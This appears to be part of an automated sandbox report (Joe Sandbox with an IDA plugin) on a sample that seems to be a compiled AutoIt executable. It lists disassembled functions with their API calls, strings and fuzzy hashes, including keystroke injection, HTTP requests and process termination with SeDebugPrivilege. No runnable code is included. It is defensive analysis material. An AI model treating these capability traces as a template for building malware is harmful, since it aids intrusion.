largeicons, xrefs: 007C20E1

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-1428604138
Opcode ID: 44678ebcea71f7af6e91efd185fe34878df11c9bf34bcec5b5fd47cf503f6316
Instruction ID: cd796dc548dee8d75207cf061671c8b2f23648f53eb178b313818b68957ef13c
Opcode Fuzzy Hash: 44678ebcea71f7af6e91efd185fe34878df11c9bf34bcec5b5fd47cf503f6316
Instruction Fuzzy Hash: 1511A7766C871BFAF6056624AC0AEA6379CEB05724B20412EF604F51D2FABD58425A14

Function 007F3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007F3A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007F3AA0
GetWindowLongW.USER32(?,000000F0), ref: 007F3AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007F3AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007F3B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 007F3BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 007F3BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 007F3BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 007F3BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 007F3C13

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 99e680d95bbd07a136150ec9f7324a4c025f9d5e163e752e5e5d62e38334dc69
Instruction ID: c1683f5126b0e00436c754243d826d8768654405ce331f4f54eef64a9ea9f3b8
Opcode Fuzzy Hash: 99e680d95bbd07a136150ec9f7324a4c025f9d5e163e752e5e5d62e38334dc69
Instruction Fuzzy Hash: 2C616975900248AFDB10DFA8CC85EFEB7B8EB49710F104199FA15E73A1C778AA45DB60

Function 007CB12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 007CB151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,007CA1E1,?,00000001), ref: 007CB165
GetWindowThreadProcessId.USER32(00000000), ref: 007CB16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007CA1E1,?,00000001), ref: 007CB17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 007CB18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,007CA1E1,?,00000001), ref: 007CB1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007CA1E1,?,00000001), ref: 007CB1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,007CA1E1,?,00000001), ref: 007CB1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,007CA1E1,?,00000001), ref: 007CB212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,007CA1E1,?,00000001), ref: 007CB21D

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: f5c1f01d5a971da35c1034af67e1564f0c52ec81c67c11de60b71f270805d518
Instruction ID: 8b6033e6bae21b83b019215812adee5a8aac421219e4fd379d6e202c8c3378f2
Opcode Fuzzy Hash: f5c1f01d5a971da35c1034af67e1564f0c52ec81c67c11de60b71f270805d518
Instruction Fuzzy Hash: AB3187B1500608AFDB259F64DE5AFBE7BA9BB91311F14840DFA01D6190D7BC9E40CF64

Function 00792C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00792C94

Part of subcall function 007929C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0079D7D1,00000000,00000000,00000000,00000000,?,0079D7F8,00000000,00000007,00000000,?,0079DBF5,00000000), ref: 007929DE
Part of subcall function 007929C8: GetLastError.KERNEL32(00000000,?,0079D7D1,00000000,00000000,00000000,00000000,?,0079D7F8,00000000,00000007,00000000,?,0079DBF5,00000000,00000000), ref: 007929F0

_free.LIBCMT ref: 00792CA0
_free.LIBCMT ref: 00792CAB
_free.LIBCMT ref: 00792CB6
_free.LIBCMT ref: 00792CC1
_free.LIBCMT ref: 00792CCC
_free.LIBCMT ref: 00792CD7
_free.LIBCMT ref: 00792CE2
_free.LIBCMT ref: 00792CED
_free.LIBCMT ref: 00792CFB

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 87021e8950783156a956f0ce464418b1cc682f994ca9065442b2c32cbbbada8b
Instruction ID: 10c9fd4b33f4b8705abeb760f8cb22df855d9478d7d198fc0990a589011a9186
Opcode Fuzzy Hash: 87021e8950783156a956f0ce464418b1cc682f994ca9065442b2c32cbbbada8b
Instruction Fuzzy Hash: A9115076500108FFCF02FF94E986C9D3BA5BF05360F5145A5FA48AB232DA35EA519F90

Function 00761410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00761459
OleUninitialize.OLE32(?,00000000), ref: 007614F8
UnregisterHotKey.USER32(?), ref: 007616DD
DestroyWindow.USER32(?), ref: 007A24B9
FreeLibrary.KERNEL32(?), ref: 007A251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 007A254B

Strings

close all, xrefs: 00761454

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 0805df486827cf2895e612dd31a051e73f6a3e82138f3e202b8de00cd63deb03
Instruction ID: 33d361d61ebb31d26f625d91be3a9528dd7e7b490b7db406e5175ee7170cba5f
Opcode Fuzzy Hash: 0805df486827cf2895e612dd31a051e73f6a3e82138f3e202b8de00cd63deb03
Instruction Fuzzy Hash: 2FD15D31701212CFCB19EF19C599A29F7A4BF45700F5882ADE94B6B252DB38ED22CF51

Function 007D359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 007D35E4

Part of subcall function 00769CB3: _wcslen.LIBCMT ref: 00769CBD

LoadStringW.USER32(00832390,?,00000FFF,?), ref: 007D360A

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 007D3724
Error: , xrefs: 007D36EF
Line %d (File "%s"):, xrefs: 007D366B
^ ERROR, xrefs: 007D36C9
"%s" (%d) : ==> %s:, xrefs: 007D3742

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 78a99472e63d48d647ed7c6b786a3d7fcf34484f4c627ab7ed6b0ddf3fb8d9d9
Instruction ID: 4b85a7487bec598291b302498ab31b6a0dc6a673e20d9e1960d5274e693c73bf
Opcode Fuzzy Hash: 78a99472e63d48d647ed7c6b786a3d7fcf34484f4c627ab7ed6b0ddf3fb8d9d9
Instruction Fuzzy Hash: 96517071800219FBDF15EBA0DD4AEEDBB78EF14710F144125F606722A1EB385A98DF61

Function 007F3886 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007F3925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 007F393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007F3954
_wcslen.LIBCMT ref: 007F3999
SendMessageW.USER32(?,00001057,00000000,?), ref: 007F39C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 007F39F4

Strings

SysListView32, xrefs: 007F38F7
@U=u, xrefs: 007F3925, 007F393A

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: @U=u$SysListView32
API String ID: 2147712094-1908207174
Opcode ID: 113d1059b24c16a5334a294643a02c10ab308bae8fe220bde888206af67fc90b
Instruction ID: 032dfb30deaba20727b2f40ac109ec4aea34ba46191c3138d867d6c534feb9c4
Opcode Fuzzy Hash: 113d1059b24c16a5334a294643a02c10ab308bae8fe220bde888206af67fc90b
Instruction Fuzzy Hash: 6541A471A0021DABEF21DF64CC49BFA77A9FF08354F100566FA58E7281D7B99980CB90

Function 007F2DFD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 007F2E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 007F2E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 007F2E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 007F2EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 007F2EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 007F2EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007F2F0B

Strings

@U=u, xrefs: 007F2E1C, 007F2EB6, 007F2EE0

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID: @U=u
API String ID: 2178440468-2594219639
Opcode ID: 5fdc226b429a4507ee581dd0535c0dfa0e7f3683e924ed53ad05fa913e59503e
Instruction ID: b4afdb65c5cdea440f6502a024a20c1728e896ef300de033624600462392d01b
Opcode Fuzzy Hash: 5fdc226b429a4507ee581dd0535c0dfa0e7f3683e924ed53ad05fa913e59503e
Instruction Fuzzy Hash: 9531F630644158DFDB218F58DD88F653BE1FB9AB10F2541A4FA00CF2B2CB75A842DB45

Function 007DC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007DC272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007DC29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007DC2CA
GetLastError.KERNEL32 ref: 007DC322
SetEvent.KERNEL32(?), ref: 007DC336
InternetCloseHandle.WININET(00000000), ref: 007DC341

Strings

, xrefs: 007DC2BB

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 0dfb7e2ec839fb3e8ae051e362875e70fdc8b902227c7c568b7e81f1969b2dbc
Instruction ID: 60fc3cf17fc9631c6f8e4508c4e234a419bd6c67648c6b262375df9dd9c843c8
Opcode Fuzzy Hash: 0dfb7e2ec839fb3e8ae051e362875e70fdc8b902227c7c568b7e81f1969b2dbc
Instruction Fuzzy Hash: 49316BB1600209AFDB22AF658D88ABB7BFCEB49744B14851EF446D2300DB38ED04DB75

Function 007C989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,007A3AAF,?,?,Bad directive syntax error,007FCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 007C98BC
LoadStringW.USER32(00000000,?,007A3AAF,?), ref: 007C98C3

Part of subcall function 00769CB3: _wcslen.LIBCMT ref: 00769CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 007C9987

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 007C98F1
Line %d (File "%s"):, xrefs: 007C992D
., xrefs: 007C996D
Error: , xrefs: 007C9955
Line %d:, xrefs: 007C9912

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 1ae96dd0286b40bc83ac88177edf8770cbe50ca06d5adb2eccd4b68d7329f4b4
Instruction ID: e4ed83947c8c43a8e8581d99cc450e224f2d702e74b498a4fba71e8a0c0a6c57
Opcode Fuzzy Hash: 1ae96dd0286b40bc83ac88177edf8770cbe50ca06d5adb2eccd4b68d7329f4b4
Instruction Fuzzy Hash: E5216F3180021EEBCF11AF90CC0AEEE7739FF18700F044459F61A621A1EB39A668DB10

Function 0079CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0079CEB7
_free.LIBCMT ref: 0079CF22
_free.LIBCMT ref: 0079CF48
_free.LIBCMT ref: 0079CF71
_free.LIBCMT ref: 0079CFA9
_free.LIBCMT ref: 0079CFDA
_free.LIBCMT ref: 0079D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0079D09C
_free.LIBCMT ref: 0079D0B5

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: c965a4691c72c3f284ad78137f5cbed16a65459ffc39c4259389fad6910f2f30
Instruction ID: 68ff80024a208b61feedbc177adab2dc69aeaf3ed1f88ddd0ccc15f93e860cdf
Opcode Fuzzy Hash: c965a4691c72c3f284ad78137f5cbed16a65459ffc39c4259389fad6910f2f30
Instruction Fuzzy Hash: 64612772904200AFDF22AFB4F899A697BA6FF05360F04466DF945A7282D63D9D019B90

Function 007DC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007DC182
GetLastError.KERNEL32 ref: 007DC195
SetEvent.KERNEL32(?), ref: 007DC1A9

Part of subcall function 007DC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007DC272
Part of subcall function 007DC253: GetLastError.KERNEL32 ref: 007DC322
Part of subcall function 007DC253: SetEvent.KERNEL32(?), ref: 007DC336
Part of subcall function 007DC253: InternetCloseHandle.WININET(00000000), ref: 007DC341

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 83f7e34b86c83a72c001c39b7b0efef1abae544a14aedbbabf6ef1f5e887aa7d
Instruction ID: 379281988078b1734166f06b258cfce5dcf8ae6978488a57bca4d2fdec939ad3
Opcode Fuzzy Hash: 83f7e34b86c83a72c001c39b7b0efef1abae544a14aedbbabf6ef1f5e887aa7d
Instruction Fuzzy Hash: 19316D7160060AEFDB229FA5DD48A76BBF9FF18300B14841EF95686710D739E814EBA0

Function 007C25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 007C3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 007C3A57
Part of subcall function 007C3A3D: GetCurrentThreadId.KERNEL32 ref: 007C3A5E
Part of subcall function 007C3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007C25B3), ref: 007C3A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 007C25BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007C25DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 007C25DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 007C25E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 007C2601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 007C2605
MapVirtualKeyW.USER32(00000025,00000000), ref: 007C260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007C2623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 007C2627

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 276ea547d6f2887659cc4fc846695e888215918ef733ecac7ed72de0aa0ffc2c
Instruction ID: a3f3018f7febcc3a6b68fc7432ee212a82f89216e6cb0a7c780a9cdf54ab8948
Opcode Fuzzy Hash: 276ea547d6f2887659cc4fc846695e888215918ef733ecac7ed72de0aa0ffc2c
Instruction Fuzzy Hash: BF01D470394218BBFB1067689C8EF693F59DF4EB12F108049F318AE0D1C9FA6855CA6D

Function 007C1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,007C1449,?,?,00000000), ref: 007C180C
HeapAlloc.KERNEL32(00000000,?,007C1449,?,?,00000000), ref: 007C1813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,007C1449,?,?,00000000), ref: 007C1828
GetCurrentProcess.KERNEL32(?,00000000,?,007C1449,?,?,00000000), ref: 007C1830
DuplicateHandle.KERNEL32(00000000,?,007C1449,?,?,00000000), ref: 007C1833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,007C1449,?,?,00000000), ref: 007C1843
GetCurrentProcess.KERNEL32(007C1449,00000000,?,007C1449,?,?,00000000), ref: 007C184B
DuplicateHandle.KERNEL32(00000000,?,007C1449,?,?,00000000), ref: 007C184E
CreateThread.KERNEL32(00000000,00000000,007C1874,00000000,00000000,00000000), ref: 007C1868

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 42e47ce3ad19e2e6a1646fa3f012049108431d2e98b031f219a87f04dc60c35b
Instruction ID: 89c61962da8e709d9a0ebdab942e464acbabaae981c6dfb5d5a9baeaeb8f8dbb
Opcode Fuzzy Hash: 42e47ce3ad19e2e6a1646fa3f012049108431d2e98b031f219a87f04dc60c35b
Instruction Fuzzy Hash: 9901A8B524030CBFE611ABA5DD4AF6B3BACEB89B11F418411FA05DB1A2CA749810DB64

Function 007EA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 007CD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 007CD501
Part of subcall function 007CD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 007CD50F
Part of subcall function 007CD4DC: CloseHandle.KERNEL32(00000000), ref: 007CD5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 007EA16D
GetLastError.KERNEL32 ref: 007EA180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 007EA1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 007EA268
GetLastError.KERNEL32(00000000), ref: 007EA273
CloseHandle.KERNEL32(00000000), ref: 007EA2C4

Strings

SeDebugPrivilege, xrefs: 007EA18F

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: e9afc842bf5a5af070ffb24bc069d2920d84a7ede88a8a271a8f7c439d40a7d2
Instruction ID: 46f845324cdcbe3b5d3196b5eda1a7447b6d4b954ad404f7cbebc56b6668c29e
